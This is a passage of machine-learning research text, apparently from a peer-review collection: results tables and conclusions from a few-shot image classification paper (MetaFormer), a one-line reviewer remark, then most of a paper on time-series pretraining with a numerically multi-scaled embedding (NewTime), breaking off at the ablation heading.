36.5 M | 67.83±0.64 | 84.28±0.69 | 74.33±0.65 | 89.56±0.79 | | OM (Qi et al., 2021) | WRN-28-10 | 36.5 M | 66.78±0.30 | 85.29±0.41 | 71.54±0.29 | 87.79±0.46 | | SUN (Dong et al., 2022) | ViT | 12.5 M | 67.80±0.45 | 83.23±0.30 | 72.99±0.50 | 86.74±0.33 | | FewTURE (Hiller et al., 2022) | ViT-Small | 22 M | 68.02±0.88 | 84.51±0.53 | 72.96±0.92 | 86.43±0.67 | | FewTURE (Hiller et al., 2022) | Swin-Tiny | 29 M | 72.40±0.78 | 86.38±0.49 | 76.32±0.87 | 89.96±0.55 | | MetaFormer-I (Ours) | ViT-Small | 24.5 M | 75.78±0.71 | 90.02±0.44 | 79.05±0.61 | 90.40±0.53 | | MetaFormer-A (Ours) | ViT-Small | 24.5 M | 79.41±0.73 | 91.21±0.44 | 84.41±0.79 | 92.47±0.47 | | HCTransformers (He et al., 2022b)| 3×ViT-Small | 63 M | 74.74±0.17 | 89.19±0.13 | 79.67±0.20 | 91.72±0.11 | | SMKD (Lin et al., 2023) | ViT-Small | 21 M | 74.28±0.18 | 88.89±0.09 | 78.83±0.20 | 91.21±0.11 | | SMKD + MetaFormer-I (Ours) | ViT-Small | 24.5 M | 76.54±0.73 | 90.76±0.41 | 80.57±0.82 | 92.42±0.49 | | SMKD + MetaFormer-A (Ours) | ViT-Small | 24.5 M | 81.61±0.75 | 92.25±0.40 | 84.43±0.80 | 93.41±0.49 | Table 2: Average classification accuracy (%) for 5-way 1-shot and 5-way 5-shot scenarios. 
Reported are the mean and 95% confidence interval on the unseen test sets of CIFAR-FS (Bertinetto et al., 2019) and FC100 (Oreshkin et al., 2018), using the established evaluation protocols.

| Method | Backbone | # Params | CIFAR-FS 1-shot | CIFAR-FS 5-shot | FC100 1-shot | FC100 5-shot |
|--------|----------|----------|-----------------|-----------------|--------------|--------------|
| ProtoNet (Snell et al., 2017) | ResNet-12 | 12.4 M | - | - | 41.54±0.76 | 57.08±0.76 |
| MetaOpt (Lee et al., 2019) | ResNet-12 | 12.4 M | 72.00±0.70 | - | 41.10±0.60 | 55.50±0.60 |
| MABAS (Kim et al., 2020) | ResNet-12 | 12.4 M | 73.51±0.92 | - | 42.31±0.75 | 58.16±0.78 |
| RFS (Tian et al., 2020) | ResNet-12 | 12.4 M | 73.90±0.80 | - | 44.60±0.70 | 60.90±0.60 |
| Meta-NVG (Zhang et al., 2021a) | ResNet-12 | 12.4 M | 74.63±0.91 | - | 46.40±0.81 | 61.33±0.71 |
| RENet (Kang et al., 2021) | ResNet-12 | 12.6 M | 74.51±0.46 | - | - | - |
| TPMM (Wu et al., 2021) | ResNet-12 | 12.4 M | 75.50±0.90 | - | 46.93±0.71 | 63.26±0.74 |
| MixFSL (Afrasiyabi et al., 2021) | ResNet-12 | 12.4 M | - | - | 44.89±0.63 | 60.70±0.60 |
| PSST (Chen et al., 2021b) | WRN-28-10 | 36.5 M | 77.02±0.38 | - | - | - |
| Meta-QDA (Zhang et al., 2021c) | WRN-28-10 | 36.5 M | 75.83±0.88 | - | - | - |
| SUN (Dong et al., 2022) | ViT | 12.5 M | 78.37±0.46 | - | - | - |
| FewTURE (Hiller et al., 2022) | ViT-Small | 22 M | 76.10±0.88 | - | 46.20±0.79 | 63.14±0.73 |
| FewTURE (Hiller et al., 2022) | Swin-Tiny | 29 M | 77.76±0.81 | - | 47.68±0.78 | 63.81±0.75 |
| MetaFormer-I (Ours) | ViT-Small | 24.5 M | 80.16±0.76 | - | 51.14±0.71 | 68.33±0.74 |
| MetaFormer-A (Ours) | ViT-Small | 24.5 M | 83.48±0.75 | - | 53.76±0.80 | 70.68±0.74 |
| HCTransformers (He et al., 2022b) | 3×ViT-Small | 63 M | 78.89±0.18 | - | 48.27±0.15 | 60.42±0.16 |
| SMKD (Lin et al., 2023) | ViT-Small | 21 M | 80.08±0.18 | - | 50.38±0.16 | 68.50±0.16 |
| SMKD + MetaFormer-I (Ours) | ViT-Small | 24.5 M | 81.49±0.74 | - | 52.18±0.78 | 71.29±0.73 |
| SMKD + MetaFormer-A (Ours) | ViT-Small | 24.5 M | 85.59±0.76 | - | 55.68±0.86 | 73.31±0.77 |

4.2 Broader Study of Few-Shot Learning

To further investigate the fast adaptation ability of our method, we evaluate MetaFormer in the more challenging cross-domain (Chen et al., 2019; Oh et al., 2022) and multi-domain (Triantafillou et al., 2020) scenarios, which contain both class and domain shifts. Appendix M and Appendix N provide the benchmark datasets and implementation details.

Cross-Domain and Multi-Domain Few-shot Classification Results. We evaluate MetaFormer meta-trained on miniImageNet on cross-domain few-shot classification benchmarks following Oh et al. (2022) in Table 12 (Appendix M.3). Compared with previous in-domain state-of-the-art meta-learning (Hiller et al., 2022) and self-supervised learning (Lin et al., 2023) methods, MetaFormer achieves significant performance improvements of up to 10.51%, underscoring its task adaptability in the face of domain gaps. In Table 13 (Appendix N.3), we assess the effectiveness of MetaFormer on the large-scale and challenging Meta-Dataset. MetaFormer surpasses PMF (Hu et al., 2022) in handling tasks with substantially different distributions.
We attribute such impressive improvement to our proposed holistic attention, a mechanism that not only facilitates sample correspondence learning but also enables knowledge reuse through inter-task attention, thus aiding task adaptation to obtain more discriminative feature representations in each task.

4.3 Ablation Study

Table 3: Component ablation studies and the number of additional learnable parameters on miniImageNet.

| SAM | TAM | Add. Params. | miniImageNet 1-shot | miniImageNet 5-shot |
|-----|-----|--------------|---------------------|---------------------|
| ✔ | ✔ | +3.57M | 75.78 ± 0.71 | 90.02 ± 0.44 |
| ✔ | ✗ | +2.01M | 74.64 ± 0.76 | - |
| ✗ | ✔ | +1.56M | 73.63 ± 0.75 | 87.76 ± 0.52 |

Component Analysis. In this section, we investigate the individual contribution of each component in MetaFormer by removing the components one by one: the Sample-level Attention Module (SAM) and the Task-level Attention Module (TAM). The impact on performance and the increase in the number of additional learnable parameters are detailed in Table 3. The table validates the contribution of each module, demonstrating that they enhance performance with only a modest increase in computational overhead. Specifically, the introduction of SAM results in a 2.15% performance gain in the 1-shot setting by facilitating sample correspondence learning, thereby enhancing consistency within the task. Furthermore, the incorporation of TAM leads to an additional improvement of 2.49% in the 5-shot setting, achieved by regularizing the current task with retrieved relevant semantics. See Appendix D for more ablation analysis.

4.4 Qualitative Analysis

Figure 3 shows visualizations of our holistic attention. The columns illustrate the attention maps of the three attention modules, respectively. The results demonstrate that sample correspondence learning guided by the spatial and sample attention modules can suppress irrelevant regions by exploiting pattern relations within and across samples, thereby learning more discriminative task-specific features. Building on this foundation, the task attention module facilitates the transfer of semantic knowledge from previous tasks to the new one, focusing particularly on the key components of foreground objects. When integrating intra- and inter-task attention, our holistic attention yields a more accurate and comprehensive response map concentrated on the foreground region.

5 Conclusions

This paper proposes MetaFormer, a novel ViT-backed meta-learning approach for few-shot classification. To fully leverage transformer characteristics, MetaFormer builds holistic attention by introducing two lightweight modules to capture intra-task and inter-task interactions. With the Sample-level Attention Module (SAM), MetaFormer captures task-specific discriminative feature representations by facilitating sample correspondence learning to enforce consistency within a task. Meanwhile, the Task-level Attention Module (TAM) retrieves the most relevant knowledge from seen tasks to regularize learning of the current task by maintaining a dynamic knowledge pool. We also extend our MetaFormer to build a new baseline for the autoregressive few-shot image classification setting. Extensive experiments demonstrate the superiority of MetaFormer within the meta-learning approach family, achieving remarkable performance on standard in-domain benchmarks as well as on more challenging cross-domain and multi-domain benchmarks.

REFERENCES

Arman Afrasiyabi, Jean-François Lalonde, and Christian Gagné.
QVVSb0GMXK
For time series from different domains, it is hard to determine a universal window length that works for all time series and contains data of a single scale. The authors may want to clarify how they resolve this problem.
NewTime: Numerically Multi-Scaled Embedding for Large-Scale Time Series Pretraining

Anonymous authors
Paper under double-blind review

Abstract

Recent research on time-series self-supervised models shows great promise in learning semantic representations. However, it has been limited to small-scale datasets, e.g., thousands of temporal sequences. In this work, we make key technical contributions that are tailored to the numerical properties of time-series data and allow the model to scale to large datasets, e.g., millions of temporal sequences. We adopt the Transformer architecture by first partitioning the input into non-overlapping windows. Each window is then characterized by its normalized shape and two scalar values denoting the mean and standard deviation within each window. To embed scalar values that may possess arbitrary numerical scales into high-dimensional vectors, we propose a numerically multi-scaled embedding module that enumerates all possible scales for the scalar values. The model undergoes pre-training using the proposed numerically multi-scaled embedding with a simple contrastive objective on a large-scale dataset containing over a million sequences. We study its transfer performance on a number of univariate and multivariate classification benchmarks. Our method exhibits remarkable improvement over previous representation learning approaches and establishes a new state of the art, even compared with domain-specific non-learning-based methods.

1 Introduction

Despite the phenomenal achievements of large-scale representation learning on various data modalities (Brown et al., 2020; Radford et al., 2021; Caron et al., 2021), research on time-series representation learning has mostly been limited to small-scale datasets without attaining generalization capabilities (Eldele et al., 2021b; Yue et al., 2022; Zhang et al., 2022). Since time-series data may cover a diverse range of domains, such as medical, weather, traffic and more, large-scale training across domains brings special challenges and opportunities for transfer learning. We notice a unique characteristic of time-series data and its representation. While RGB images are represented by fixed and discretized numerical values from 0 to 255, and natural languages are tokenized to a fixed dictionary, time-series data exhibit numerical values that are continuous and of drastically different scales. For instance, temperature usually varies from -30 to 30 degrees Celsius, but altitude is on the scale of $10^3$ meters. The scale of numerical variations generally depends on the physical properties of the time-series data. As illustrated in Figure 1, sequences from certain time-series categories, and even a single time-series sequence, may exhibit structures at multiple scales due to a change in physical properties. Deep neural networks trained with gradient descent need proper normalization for optimization to a good local minimum (Ioffe & Szegedy, 2015; Ba et al., 2016). However, encoding time-series data into a normalized vector space turns out to be a non-trivial problem. Z-score normalization is a popular technique that assumes a single dominant scale in the dataset. Instance normalization preprocesses the data by per-instance statistics and thus removes information that could be critical for representation learning. As a result, both conventional data encoding methods fail to effectively encode time-series data with a high variation of numerical scales.
Additionally, the distribution shift problem (Fawaz et al., 2018) between pretraining and finetuning requires the model to generalize and adapt to novel variation scales. The dilemma between normalization for effective network optimization and high variation of data scales poses a challenge for time-series representation learning, especially in the large-scale scenario.

Figure 1: (a) Numerical scales of three temporal sequences from three datasets differ significantly. (b) Even a single sequence may contain multiple scales of variations. The zoom-in view shows the local structure of small variations. Note that sequences are shifted above the x-axis and presented in a logarithmic scale for better visualization.

We introduce NewTime, a Transformer-based architecture for time-series data with a novel embedding module that effectively embeds data of arbitrary scale. For a time-series sequence, we first divide it into non-overlapping small windows, so that data within each window has a simple structure that can be easily modeled at a single scale. A window is characterized by three factors: its mean, its standard deviation (std), and its normalized shape. The embedding vectors of the three factors are combined and fed as an input token to a general-purpose Transformer for representation learning. The normalized shapes across windows and samples are of similar numerical scale, and thus can be embedded by a simple linear layer. The challenge of embedding the entire sequence therefore reduces to embedding a set of means and standard deviations, which may vary in scale arbitrarily. To encode these scalars into a high-dimensional vector space, we propose a numerically multi-scaled embedding module. Since encoding through network modules, such as a linear layer, may need to assume the scale of the input data, our idea is to simply enumerate all possible scales for the scalar and later fuse the embeddings across scales. We use a basic building block of a linear layer followed by a LayerNorm (Ba et al., 2016) to map a scalar to a normalized vector space. Such a basic building block is sensitive to the input range, which is controlled by a multiplier on the bias in the linear layer. We thus use parallel building blocks with a different multiplier set for each scale. The output embeddings are aggregated by a weighting mechanism to derive the final scalar embedding. To conduct large-scale representation learning, we collect pretraining data by fusing existing datasets from multiple sources, yielding a dataset with over one million time-series sequences. We pretrain our NewTime model using a straightforward BYOL (Grill et al., 2020) self-supervised learning objective and study the transfer performance on popular classification benchmarks. NewTime obtains remarkable improvements on both univariate and multivariate time series classification tasks and achieves new state-of-the-art results across benchmarks. We also demonstrate that NewTime outperforms recent approaches on few-shot learning without being designed for this task, and that it easily transfers to various downstream tasks, such as clustering and anomaly detection. In summary, this work makes three key contributions:
- We propose a numerically multi-scaled embedding module for encoding scalar values in a wide range into a normalized vector space.
- We design a Transformer-based solution for time series representation learning with each input token representing its shape embedding, mean embedding, and std embedding.
- We conduct the first large-scale self-supervised pretraining for time-series data and demonstrate that transferable representations can be learned from a vast set of disparate data.

2 RELATED WORK

2.1 UNSUPERVISED REPRESENTATION LEARNING FOR TIME SERIES

Several studies have successfully applied unsupervised representation learning to time series data. T-Loss (Franceschi et al., 2019) is a leading effort that combines a dilated causal architecture and a triplet loss. TS-TCC (Eldele et al., 2021a) and TS2Vec (Yue et al., 2022) further incorporate dedicated learning objectives, e.g., contextual and hierarchical losses, and handcrafted augmentation functions. TST (Zerveas et al., 2021) formulates a masked modeling framework for time series representation learning. BTSF (Yang & Hong, 2022) and TF-C (Zhang et al., 2022) introduce a complementary frequency domain, using consistency between the temporal and frequency domains as the supervision signal. All of these works show that an unsupervised pretrained model can offer a substantial improvement over its fully supervised counterpart. Albeit encouraging, most of these works limit pretraining to small datasets and focus on a "one-to-one" scenario, i.e., pretrain on a single dataset and fine-tune on the same or a similar domain. Zhang et al. (2022) take a step further and investigate a "one-to-many" setting that fine-tunes an EEG-pretrained model for either hand-gesture recognition or mechanical fault prediction. They also discuss a "many-to-one" setting where the model is pretrained on a mixture of multiple datasets and subsequently finetuned on a single pure dataset. However, the finetuning performance decreases with increasing heterogeneity of the pretraining datasets. The core promise of unsupervised learning, namely its capability to take advantage of large amounts of data, remains to be explored.

2.2 Numerical Data Normalization

Data encoding and normalization play a key role in machine learning systems. Z-score and instance normalization are two popular methods commonly used in time series analysis. Z-score normalizes the data according to dataset statistics and thus is prone to the distribution shift problem. Instance normalization standardizes each sample to zero mean and unit standard deviation, but removes part of the information needed to recover the raw data. To address this issue, reversible instance normalization (Kim et al., 2021) has been proposed, which adds back the mean and std statistics at the network predictions for forecasting problems. Gorishniy et al. (2022) explore embedding numerical features using piece-wise linear and periodic functions for tabular data. Our work is similar in proposing an effective numerical embedding for scalar values. Unlike previous works, the goal of this work is to enable large-scale pretraining for time-series data.

3 NewTime

3.1 Problem Statement

Our goal is to conduct self-supervised pretraining for time series on a large-scale dataset covering various domains with very different signal characteristics. Due to their physical properties, time-series data may exhibit different scales of variation. For example, sequences belonging to a certain category may exhibit variations on a numerical scale of 0.01, whereas those from another category may vary on a numerical scale of $10^4$. Variation scales may even change within a single time-series sequence. Joint training on such diverse large-scale datasets introduces new challenges.
Normalization for data preprocessing is a viable technique for mitigating the aforementioned issue. Popular normalization methods include Z-score and instance normalization. Z-score involves computing the mean and standard deviation statistics for the entire dataset, subsequently normalizing each sample by subtracting the mean and dividing by the std. However, it does not address the numerical challenge for the following reasons:
- Z-score assumes a single dominant scale of the dataset. Samples of this scale may be properly normalized, while samples outside this scale may be badly normalized.
- During transfer learning, the target domain may not share the same statistics as the training dataset, thus inducing a distribution shift problem.

Instance normalization operates by standardizing each sample using its respective per-sample mean and standard deviation. After processing, each sample is guaranteed to have zero mean and unit standard deviation. The caveats of this method include:
- Essential information about the statistics of samples is removed, which could be detrimental to representation learning.
- Instance normalization assumes a single scale of variation within a single sample. It will be ineffective if the sequence is long and contains multiple scales of variations.

Based on these observations, we propose our approach for modeling large-scale time-series data.

3.2 Architecture Overview

To build the pretraining model for time series analysis, we exploit the general-purpose Transformer (Vaswani et al., 2017), as it has been successfully adopted in natural language, speech and vision. The idea is to convert the input sequence into a set of tokens and then feed the tokens into the Transformer architecture. An extra \([\text{CLS}]\) token is inserted at position 0 of the input, and an MLP head is appended after the Transformer encoder for classification. In the following, we assume the time series data to be univariate for simplicity. The extension to the multivariate case is explained in Section 3.4. The overall architecture of NewTime is depicted in Figure 2. We follow the tokenization process of the Vision Transformer (Dosovitskiy et al., 2020) by splitting the time series sequence into non-overlapping windows. Given the numerical challenges described earlier, it is not feasible to embed each window using a simple linear layer. Instead, we may assume that data within each window has a single scale of variation, given that the window size is small. We normalize each window by its mean and std, then represent the window by three factors: the normalized shape, the mean scalar, and the std scalar. We concatenate the normalized shape embedding and the two scalar embeddings, and further project the concatenation to the feature dimension of the Transformer. The resulting embedding is treated as an input token. After a positional encoding is added, it is fed to the Transformer encoder. The normalized shape can be easily embedded with a linear layer and a layer normalization. However, embedding scalar values of unknown scales of variation is less obvious.
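To make the windowing step concrete, here is a minimal PyTorch sketch of the tokenization just described; the function name is ours, and the default window size of 16 is taken from the implementation details in Section 4.1.

```python
import torch

def tokenize(x, window_size=16, eps=1e-5):
    """Split univariate sequences into non-overlapping windows and describe
    each window by its normalized shape, mean, and standard deviation.

    x: (batch, length) tensor; length is assumed divisible by window_size.
    Returns: shape (batch, num_windows, window_size), mean/std (batch, num_windows).
    """
    b, t = x.shape
    w = x.reshape(b, t // window_size, window_size)
    mean = w.mean(dim=-1)
    std = w.std(dim=-1)
    shape = (w - mean.unsqueeze(-1)) / (std.unsqueeze(-1) + eps)  # per-window normalization
    return shape, mean, std
```

The shape tensor is what the simple linear embedding layer consumes; the mean and std scalars are handled by the module developed next.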
3.3 Numerically Multi-scaled Embedding

A Case Study of Linear + LayerNorm for Encoding Scalars We begin by analyzing the encoding behavior of a simple linear layer followed by layer normalization (LayerNorm) (Ba et al., 2016). The LayerNorm is crucial here because a linear layer alone preserves the magnitude of the input scalar, which would cause unstable optimization during neural network training. Denoting the input scalar as \(x\), we can express this simple encoding block as follows:
\[ z = \text{FC}(x) = x \cdot w + k \cdot b \quad (k = 1 \text{ by default}), \]
\[ y = \text{LN}(z) = \gamma \ast \frac{z - E[z]}{\sqrt{\text{Var}[z]}} + \beta = \gamma \ast \frac{x \cdot w + k \cdot b}{\sqrt{x^2 \sigma_w^2 + k^2 \sigma_b^2}} + \beta, \]
where \(w\) and \(b\) are parameters of the linear layer, randomly initialized from the Gaussian distributions \(\mathcal{N}(0, \sigma_w^2)\) and \(\mathcal{N}(0, \sigma_b^2)\), respectively. \(\gamma\) and \(\beta\) are learnable affine parameters for the layer normalization and are assumed to be constant 1 and 0 here for simplicity. Note that we add a multiplier \(k\) to the bias parameter. This will help us understand the behavior of the embedding module.

Figure 3: (a) **Output of a Basic Building Block**. The input and output response of the basic building block of a linear layer and a LayerNorm with different multipliers $k$ set for the bias term. Only a single channel of the output is visualized. The function saturates when the input is outside a scale related to $k$. (b) **Numerically Multi-scaled Embedding**. The numerically multi-scaled embedding module ensembles multiple basic building blocks with different multipliers $k$. The embeddings are ensembled by a weighted average.

We first notice that the output $y$ with respect to $x$ is no longer a linear function. In Figure 3(a), we plot one channel of the output $y$ as a function of $x$ for a number of $k$ values. The parameters $w, b$ are randomly initialized. When $|x| \gg |k|$, $y$ converges to the constants $\pm w/\sigma_w$; and when $|x| \ll |k|$, $y$ converges to the constants $\pm b/\sigma_b$. This means that $y$ fails to encode anything about $x$ when $x$ is significantly larger or smaller than a scale defined by $k$.

**Ensembles of Numerically Multi-scaled Embeddings** Given the above analysis of the basic building block, we would need to set a proper $k$ at a scale similar to the input $x$. However, one cannot simply set $k = x$, because the overall function would then cancel out $x$. We choose instead to enumerate all possible scales and ensemble the embeddings across scales. Let $y_i(x)$ denote the embedding of input scalar $x$ at scale $k_i$. The numerically multi-scaled embedding (NME) $e(x)$ is defined as:

$$e(x) = \sum_i \alpha_i(x) \cdot y_i(x),$$

$$\alpha_i(x) = \frac{\left|\log(|x|/k_i + \epsilon)\right|^{-1}}{\sum_{j=1}^{n} \left|\log(|x|/k_j + \epsilon)\right|^{-1}},$$

where $\alpha_i$ is a weighting term based on the proportion between $x$ and $k_i$ (it peaks when $|x|$ is close to $k_i$), and $n$ is the number of ensembled embeddings. An ablation on the weighted average is presented in Appendix B. We densely set the values of $k_i$ as $10^{-4}, 10^{-3}, ..., 1, 10, ..., 10^3, 10^4$, so that they cover almost all scales of variation in the pretraining dataset. With the proposed numerically multi-scaled embedding, we are able to represent arbitrary scalar values in a normalized vector space. The normalized vector space ensures that gradients for learning flow smoothly.

### 3.4 Extension to Multivariate Data

For multivariate time-series analysis, we encode each window independently for each time-series channel using the aforementioned method. The network parameters for encoding each window are shared across multivariate channels. Then, the embeddings for each window are concatenated across channels, and a linear layer follows to transform them to the Transformer feature size. The resultant embeddings are fed to the Transformer encoder.
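Below is a minimal PyTorch sketch of the numerically multi-scaled embedding; the class and argument names are ours, and we read the $\left|\log(\cdot)\right|^{-1}$ weighting as the reciprocal of the absolute logarithm.

```python
import torch
import torch.nn as nn

class ScaleBlock(nn.Module):
    """Linear + LayerNorm with the bias term scaled by a multiplier k."""
    def __init__(self, dim, k):
        super().__init__()
        self.fc = nn.Linear(1, dim)
        self.ln = nn.LayerNorm(dim)
        self.k = k

    def forward(self, x):                         # x: (..., 1)
        z = x * self.fc.weight.squeeze(-1) + self.k * self.fc.bias   # z = x*w + k*b
        return self.ln(z)

class MultiScaledEmbedding(nn.Module):
    """Ensemble of ScaleBlocks with k = 10^-4, ..., 10^4, fused by a weight
    alpha_i that peaks when |x| is close to k_i."""
    def __init__(self, dim, exponents=range(-4, 5), eps=1e-8):
        super().__init__()
        self.ks = [10.0 ** e for e in exponents]
        self.blocks = nn.ModuleList(ScaleBlock(dim, k) for k in self.ks)
        self.eps = eps

    def forward(self, x):                          # x: (..., 1) means or stds
        ys = torch.stack([blk(x) for blk in self.blocks])             # (n, ..., dim)
        logs = torch.stack([torch.log(x.abs() / k + self.eps).abs() for k in self.ks])
        alpha = 1.0 / (logs + self.eps)            # large weight when |x| is near k_i
        alpha = alpha / alpha.sum(dim=0, keepdim=True)
        return (alpha * ys).sum(dim=0)             # (..., dim)

emb = MultiScaledEmbedding(dim=64)
tokens = emb(torch.tensor([[0.01], [3.0], [2.5e3]]))   # scalars at very different scales
```

The three example inputs span five orders of magnitude, yet each is dominated by the block whose multiplier matches its scale, so every scalar lands in a well-normalized embedding space.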
## 4 Experiments

### 4.1 Experimental Settings

**Pretraining Dataset** Existing datasets for time series analysis are individually relatively small. To address this limitation and facilitate large-scale representation learning, we propose to merge several existing datasets into a unified dataset. We consider three main sources: (1) the UCR time series archive (Dau et al., 2019), (2) the UEA time series archive (Bagnall et al., 2018) and (3) eight additional datasets used in recent technical papers (Eldele et al., 2021b; Zhang et al., 2022; Dong et al., 2023). The original training and testing splits of these datasets are retained, and only the training portions are merged. The merged dataset consists of approximately 1.89 million univariate sequences for training. Details of the three data sources are provided below. (1) The UCR time series archive (Dau et al., 2019) contains 128 univariate time series datasets from various sources, including sensor, motion, trajectory, etc. In total, there are 60,555 training sequences across these 128 sub-datasets under their official splits. (2) The UEA benchmark (Bagnall et al., 2018) contains 30 datasets with a wide range of cases, dimensions and series lengths for multivariate time series classification. For self-supervised pretraining, datasets containing excessively lengthy sequences are excluded, after which the multivariate data is partitioned into univariate sequences. This finally leads to 1,386,874 sequences for training. (3) Other commonly used datasets in recent technical papers (Eldele et al., 2021b; Zhang et al., 2022; Dong et al., 2023) include: EPILEPSY (Andrzejak et al., 2001), SLEEP EEG (Kemp et al., 2000), HAR (Anguita et al., 2013), GESTURE (Liu et al., 2009), FD-A (Lessmeier et al., 2016), FD-B (Lessmeier et al., 2016), ECG (Clifford et al., 2017) and EMG (Goldberger et al., 2000). These datasets in total contain 441,757 training sequences. More information about these datasets is included in Appendix A.

**Pretraining Objective** For self-supervised pretraining, we adopt the BYOL (Grill et al., 2020) objective for its simplicity and effectiveness. Two views of the input after data augmentation are fed to a Siamese network, where the base encoder is trained to predict the representation of the momentum encoder. We refer to the original paper for details.

**Implementation Details** We adopt a 6-layer, 8-head standard Transformer encoder with fixed sinusoidal positional encoding (Vaswani et al., 2017) as the backbone for our experiments. It uses 128-dimensional latent vectors through all of its layers, with 512 dimensions for the MLP hidden layer. The window size for input patches is 16. For the numerically multi-scaled embedding, we use 9 scales, ranging from $10^{-4}$ to $10^4$ by factors of 10. For pretraining, we simply choose the data augmentation of "random resized crop" for the BYOL objective. It randomly crops a sub-sequence covering between 80% and 100% of the original data, and subsequently resizes the selected sub-sequence to a length of 512.
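The crop augmentation amounts to the following sketch (our own minimal implementation; the actual pipeline may differ in details such as per-sample versus per-batch crop parameters):

```python
import torch
import torch.nn.functional as F

def random_resized_crop(x, out_len=512, min_scale=0.8, max_scale=1.0):
    """Crop a random sub-sequence covering 80%-100% of the input and resize
    it to a fixed length by linear interpolation.

    x: (batch, length) univariate sequences.
    """
    b, t = x.shape
    scale = torch.empty(1).uniform_(min_scale, max_scale).item()
    crop_len = max(2, int(t * scale))
    start = torch.randint(0, t - crop_len + 1, (1,)).item()
    crop = x[:, start:start + crop_len].unsqueeze(1)               # (b, 1, crop_len)
    out = F.interpolate(crop, size=out_len, mode="linear", align_corners=False)
    return out.squeeze(1)                                          # (b, out_len)
```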
The base learning rate is $2 \times 10^{-3}$ for a batch size of 2048, following the linear scaling rule (Goyal et al., 2017). The model is trained for a total of 100 epochs with a linear learning rate warm-up during the first 10 epochs of training and a cosine learning rate decay schedule (Loshchilov & Hutter, 2017) afterward. For optimization, we use AdamW (Loshchilov & Hutter, 2018) with $\beta_1 = 0.9$, $\beta_2 = 0.999$ and a weight decay of 0.05. The pretraining takes 6 hours on 4 V100 GPUs. We transfer the pretrained model to each downstream classification task by full finetuning. The finetuning takes 100 epochs with a learning rate of $2 \times 10^{-4}$ by default. Since the model is pretrained on univariate data, an additional linear layer is added to the data embedding module for the multivariate classification tasks. For all experiments, we report the top-1 accuracy ("Acc." for short, %) and the macro F1 score (%) on the test set using the best model on the validation set.

4.2 Univariate Time Series Classification

Compared with Supervised Baselines We first evaluate our model for univariate time series classification on 112 sub-datasets from the UCR archive. The 112 sub-datasets are chosen to exclude datasets containing series of unequal length or missing values, following the practice of HIVE-COTE 2.0 (HC2) (Middlehurst et al., 2021b). The state-of-the-art method HC2 is a heavily engineered system that ensembles a distinct set of classifiers: the shapelet-based classifiers (Bostrom & Bagnall, 2015), the ensemble of convolution-based classifiers (Dempster et al., 2020), the dictionary-based representation TDE (Middlehurst et al., 2021a) and the interval-based DrCIF (Middlehurst et al., 2020). Moreover, HC2 takes 1,500 epochs to train the learning-based part of its ensemble system. Due to the great domain expertise engineered into the state-of-the-art methods, only one deep learning method, InceptionTime (Ismail Fawaz et al., 2020), ranks in the top 10 of the leaderboard. No prior self-supervised time series model performs close to HC2 and related methods. For fair comparison, we ensemble the results of 5 runs, each finetuned for 500 epochs with a different random seed using the same pretrained model. As shown in the critical difference diagram in Figure 4(a), the NewTime model achieves first place on this challenging benchmark. This is the first time that a pretrained model with a transfer learning pipeline outperforms domain-specific features and classifiers. Detailed comparisons with other methods are shown in Figure 5. Full results for these 112 datasets are in Appendix F.1.

Compared with Self-supervised Baselines To compare with previous self-supervised representation learning methods, we consider the downstream classification tasks on 125 UCR datasets, Epilepsy, FD-B and EMG, following Yue et al. (2022) and Zhang et al. (2022). The baseline methods conduct unsupervised learning on individual small datasets of thousands of sequences, and evaluate the learned representation on the testing set via finetuning or linear probing. Our approach is the first able to pretrain models across datasets with high diversity. Our model is also the simplest in terms of minimal data augmentation and a simple BYOL learning objective. The results are summarized in Table 1, and full results for the 125 UCR sub-datasets are in Appendix F.1. The reported performance for our model is the average of 5 independent runs. Our NewTime model outperforms the baselines on all the tested benchmarks.

4.3 Multivariate Time Series Classification

Compared with Supervised Baselines We transfer the same pretrained model on univariate time-series data to multivariate classification benchmarks via the extension to the data embedding module described in Section 3.4.
We first evaluate its performance on the UEA archive and compare it with state-of-the-art techniques, which are domain-specific supervised methods. The critical difference diagram and detailed comparisons to previous methods are shown in Figure 4(b) and Figure 6. Detailed results on the 26 datasets are in Appendix F.2. Our NewTime model achieves first place on this challenging benchmark against heavily engineered competitors. This demonstrates that the pretrained model successfully learns a representation that transfers from single-dimensional to multi-dimensional data.

Table 1: Performance comparisons with self-supervised models for univariate time series classification.

| Method | 125 UCR Avg. Acc. | Epilepsy Acc. | Epilepsy Macro-F1 | FD-B Acc. | FD-B Macro-F1 | EMG Acc. | EMG Macro-F1 |
|--------|-------------------|---------------|-------------------|-----------|---------------|----------|--------------|
| TNC | 74.31 | - | - | - | - | - | - |
| T-Loss | 78.75 | - | - | - | - | - | - |
| TS-TCC | 73.96 | 92.53±0.98 | 86.33±2.15 | 54.99±2.20 | 54.18±3.38 | - | - |
| TS2Vec | 82.01 | 93.95±0.44 | 90.45±0.67 | 47.90±1.13 | 43.89±1.07 | - | - |
| TF-C | - | 94.95±1.08 | 91.49±5.34 | 69.38±2.31 | 74.87±2.68 | - | - |
| Ours | **86.91±0.10** | **95.73±0.10** | **93.11±0.16** | **92.86±2.04** | **93.64±1.99** | - | - |

Table 2: Performance comparisons with self-supervised models for multivariate time series classification.

| Method | 29 UEA Avg. Acc. | 29 UEA Avg. Rank | Gesture Acc. | Gesture Macro-F1 |
|--------|------------------|------------------|--------------|------------------|
| TNC | 67.7 | 4.8 | - | - |
| T-Loss | 67.5 | 3.9 | - | - |
| TS-TCC | 68.2 | 4.5 | 71.88±3.49 | 69.84±3.60 |
| TS2Vec | 71.2 | 3.2 | 69.17±3.33 | 65.70±3.92 |
| TF-C | - | - | 76.42±1.96 | 75.72±3.11 |
| Ours | **77.8±0.43** | **1.5** | **80.00±1.36** | **78.97±0.90** |

Table 3: Few-shot learning results (5 shots) on the UCR archive.

| Method | Acc. |
|------------|------|
| 1NN | 56.6 |
| DTW | 61.8 |
| BOSS | 62.5 |
| ResNet-Scratch | 62.7 |
| FS-1 | 65.3 |
| FS-2 | 66.3 |
| Ours | **67.5** |

Compared with Self-supervised Baselines We also compare the performance with strong self-supervised representation learning models. The results are summarized in Table 2, and full results are shown in Appendix F.2. Our model outperforms the baseline models by scaling the pretraining data effectively, even with simple data augmentation and a simple learning objective.

4.4 Few-Shot Learning

One critical capability of a large-scale representation learning model is few-shot generalization. We follow a recent paper (Narwariya et al., 2020) for a few-shot time-series benchmark using 41 datasets from the UCR archive. We consider the 5-shot learning scenario, and 100 episodes are drawn from each dataset. By finetuning the pretrained model with few-shot data, NewTime outperforms dedicated methods designed for few-shot adaptation, such as meta-learning approaches. The results are summarized in Table 3, with details shown in Appendix E.3.

4.5 Ablation Study

